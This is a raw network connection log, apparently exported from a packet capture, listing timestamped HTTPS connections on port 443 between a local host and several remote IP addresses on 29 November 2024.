Nov 29, 2024 12:27:19.712548971 CET	49706	443	192.168.2.8	149.154.167.99
Nov 29, 2024 12:27:19.715192080 CET	49706	443	192.168.2.8	149.154.167.99
Nov 29, 2024 12:27:19.759344101 CET	443	49706	149.154.167.99	192.168.2.8
Nov 29, 2024 12:27:19.795017004 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:19.796987057 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:19.801078081 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:19.801724911 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:19.802448988 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:19.990997076 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:19.994924068 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:19.997992992 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:19.998055935 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:19.998146057 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:19.998202085 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:20.000566006 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:20.000571012 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:20.000614882 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:20.000629902 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:20.000674009 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:20.001874924 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:20.003170013 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:20.003258944 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:20.115020990 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:20.120574951 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:20.122080088 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:20.123179913 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:20.123234987 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:20.215142012 CET	443	49706	149.154.167.99	192.168.2.8
Nov 29, 2024 12:27:20.215171099 CET	443	49706	149.154.167.99	192.168.2.8
Nov 29, 2024 12:27:20.215210915 CET	443	49706	149.154.167.99	192.168.2.8
Nov 29, 2024 12:27:20.215220928 CET	49706	443	192.168.2.8	149.154.167.99
Nov 29, 2024 12:27:20.215235949 CET	443	49706	149.154.167.99	192.168.2.8
Nov 29, 2024 12:27:20.215254068 CET	49706	443	192.168.2.8	149.154.167.99
Nov 29, 2024 12:27:20.215256929 CET	443	49706	149.154.167.99	192.168.2.8
Nov 29, 2024 12:27:20.215333939 CET	49706	443	192.168.2.8	149.154.167.99
Nov 29, 2024 12:27:20.215333939 CET	49706	443	192.168.2.8	149.154.167.99
Nov 29, 2024 12:27:20.218003035 CET	49706	443	192.168.2.8	149.154.167.99
Nov 29, 2024 12:27:20.218019962 CET	443	49706	149.154.167.99	192.168.2.8
Nov 29, 2024 12:27:20.309827089 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:20.312700987 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:20.318403959 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:20.318444014 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:20.318484068 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:20.318514109 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:20.320543051 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:20.321218014 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:20.323117018 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:20.432820082 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:20.440512896 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:20.443032980 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:20.510196924 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:20.513185978 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:20.513323069 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:20.633806944 CET	49707	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:20.633841038 CET	443	49707	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:20.633913994 CET	49707	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:20.633955956 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:20.634013891 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:20.634197950 CET	49707	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:20.634212017 CET	443	49707	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:20.635138988 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:20.635327101 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:20.636814117 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:20.643786907 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:20.643858910 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:20.643950939 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:20.644001007 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:20.646568060 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:20.646647930 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:20.766705036 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:20.809580088 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:20.835522890 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:20.838733912 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:20.949153900 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:20.952179909 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:20.958664894 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:20.958767891 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:20.959708929 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:20.961460114 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:20.993638039 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:20.993693113 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:20.993755102 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:20.996537924 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:20.996776104 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:21.081522942 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:21.116858006 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:21.185415983 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:21.190989971 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:21.273828983 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:21.273946047 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:21.277017117 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:21.309071064 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:21.311496973 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:21.318949938 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:21.319067955 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:21.319127083 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:21.319863081 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:21.321257114 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:21.321518898 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:21.431524038 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:21.441561937 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:21.510637999 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:21.514332056 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:21.623588085 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:21.626291037 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:21.633122921 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:21.633310080 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:21.638605118 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:21.638674021 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:21.638746977 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:21.658109903 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:21.658998966 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:21.660279036 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:21.778142929 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:21.780214071 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:21.830451012 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:21.846239090 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:21.970530033 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:21.975727081 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:21.975790024 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:21.975867033 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:22.015201092 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:22.065574884 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:22.120474100 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:22.167571068 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:22.214215040 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:22.244679928 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:22.248878002 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:22.258796930 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:22.312340975 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:22.313131094 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:22.368968010 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:22.421679974 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:22.432390928 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:22.433254004 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:22.546320915 CET	443	49707	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:22.546483994 CET	49707	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:22.555711985 CET	49707	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:22.555730104 CET	443	49707	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:22.555970907 CET	443	49707	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:22.556020021 CET	49707	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:22.556914091 CET	49707	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:22.565345049 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:22.571933031 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:22.572009087 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:22.578198910 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:22.579174042 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:22.599334002 CET	443	49707	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:22.624766111 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:22.627372026 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:22.630419970 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:22.630497932 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:22.630532980 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:22.630588055 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:22.632702112 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:22.632812977 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:22.698154926 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:22.699018955 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:22.747551918 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:22.752588034 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:22.752631903 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:22.893064022 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:22.896739960 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:22.939399958 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:22.942714930 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:22.944814920 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:22.944880962 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:22.947998047 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:22.948046923 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:22.948061943 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:22.948220015 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:22.951631069 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:22.952864885 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:23.016786098 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:23.062854052 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:23.068197012 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:23.071608067 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:23.072854996 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:23.211678028 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:23.214876890 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:23.263633966 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:23.264765024 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:23.266812086 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:23.266967058 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:23.268270969 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:23.268362045 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:23.268441916 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:23.269058943 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:23.270270109 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:23.271060944 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:23.321965933 CET	443	49707	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:23.322062016 CET	443	49707	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:23.322140932 CET	49707	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:23.324615955 CET	49707	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:23.324629068 CET	443	49707	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:23.333689928 CET	49708	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:23.333733082 CET	443	49708	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:23.333834887 CET	49708	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:23.334023952 CET	49708	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:23.334039927 CET	443	49708	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:23.334872961 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:23.386765003 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:23.388947964 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:23.390166044 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:23.391122103 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:23.530407906 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:23.534316063 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:23.582114935 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:23.582684994 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:23.585514069 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:23.587421894 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:23.587471962 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:23.587538004 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:23.588757038 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:23.591917038 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:23.592303038 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:23.654319048 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:23.705707073 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:23.711774111 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:23.712227106 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:23.722090960 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:23.724164009 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:23.823558092 CET	49676	443	192.168.2.8	52.182.143.211
Nov 29, 2024 12:27:23.885719061 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:23.897538900 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:23.900676966 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:23.903779984 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:23.903826952 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:23.905980110 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:23.910645962 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:23.910703897 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:23.910818100 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:23.910873890 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:23.913038015 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:23.913328886 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:24.020776987 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:24.026036978 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:24.033158064 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:24.033519983 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:24.089397907 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:24.092037916 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:24.212069988 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:24.218327045 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:24.220866919 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:24.228446007 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:24.228512049 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:24.230454922 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:24.230484009 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:24.230516911 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:24.230545998 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:24.230556965 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:24.232259989 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:24.233933926 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:24.350547075 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:24.389755964 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:24.470413923 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:24.473539114 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:24.555535078 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:24.555556059 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:24.555571079 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:24.555586100 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:24.555632114 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:24.555664062 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:24.588680983 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:24.592806101 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:24.593954086 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:24.594826937 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:24.633793116 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:24.709820986 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:24.713673115 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:24.715015888 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:24.715744972 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:24.790384054 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:24.804801941 CET	443	49708	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:24.804927111 CET	49708	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:24.846446037 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:24.876091957 CET	49673	443	192.168.2.8	23.206.229.226
Nov 29, 2024 12:27:24.905580044 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:24.916728020 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:24.916790009 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:24.916830063 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:24.964199066 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:24.980528116 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:24.981275082 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:24.984447956 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:24.986150980 CET	49708	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:24.986176014 CET	443	49708	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:24.989284992 CET	49708	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:24.989291906 CET	443	49708	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:24.993731022 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:24.994895935 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:24.997725964 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:25.101253986 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:25.104412079 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:25.113708019 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:25.114887953 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:25.117748022 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:25.260691881 CET	49672	443	192.168.2.8	23.206.229.226
Nov 29, 2024 12:27:25.296389103 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:25.299227953 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:25.305720091 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:25.305773020 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:25.308209896 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:25.309926987 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:25.312171936 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:25.314341068 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:25.314383984 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:25.314444065 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:25.314487934 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:25.316966057 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:25.317141056 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:25.419878960 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:25.429316998 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:25.434221029 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:25.438561916 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:25.438580036 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:25.615020990 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:25.618725061 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:25.626250982 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:25.628487110 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:25.630610943 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:25.630671978 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:25.632869959 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:25.633920908 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:25.633964062 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:25.634000063 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:25.634053946 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:25.636873960 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:25.637291908 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:25.738655090 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:25.748469114 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:25.752779007 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:25.756814957 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:25.757160902 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:25.955092907 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:25.955452919 CET	443	49708	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:25.955524921 CET	443	49708	95.217.25.228	192.168.2.8
Nov 29, 2024 12:27:25.955527067 CET	49708	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:25.955579996 CET	49708	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:27:25.958121061 CET	443	49705	13.107.246.63	192.168.2.8
